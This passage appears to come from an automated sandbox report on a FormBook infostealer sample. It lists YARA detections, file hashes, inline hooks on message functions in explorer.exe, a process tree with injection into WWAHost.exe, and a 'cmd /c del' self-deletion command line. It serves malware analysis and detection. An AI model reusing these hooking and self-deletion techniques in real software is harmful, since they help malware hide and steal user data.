                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Code Manipulations

                                                                                  User Modules

                                                                                  Hook Summary

                                                                                  Function NameHook TypeActive in Processes
                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                  GetMessageWINLINEexplorer.exe
                                                                                  GetMessageAINLINEexplorer.exe

                                                                                  Processes

                                                                                  Process: explorer.exe, Module: user32.dll
                                                                                  Function NameHook TypeNew Data
                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE2
                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE2
                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE2
                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE2

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:12:15:10
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Users\user\Desktop\444890321.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\444890321.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:245867 bytes
                                                                                  MD5 hash:F161FE51FEE0CD2F542EA759241C88CB
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:12:15:11
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Users\user\Desktop\444890321.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\444890321.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:245867 bytes
                                                                                  MD5 hash:F161FE51FEE0CD2F542EA759241C88CB
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:12:15:11
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                  Imagebase:0x7ff6741d0000
                                                                                  File size:19352 bytes
                                                                                  MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:12:15:17
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff714890000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:15:37
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\SysWOW64\autochk.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\SysWOW64\autochk.exe
                                                                                  Imagebase:0x2e0000
                                                                                  File size:871424 bytes
                                                                                  MD5 hash:34236DB574405291498BCD13D20C42EB
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:12:15:37
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                                                  Imagebase:0xa30000
                                                                                  File size:829856 bytes
                                                                                  MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:12:15:41
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\444890321.exe'
                                                                                  Imagebase:0x1e0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:15:42
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6b2800000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >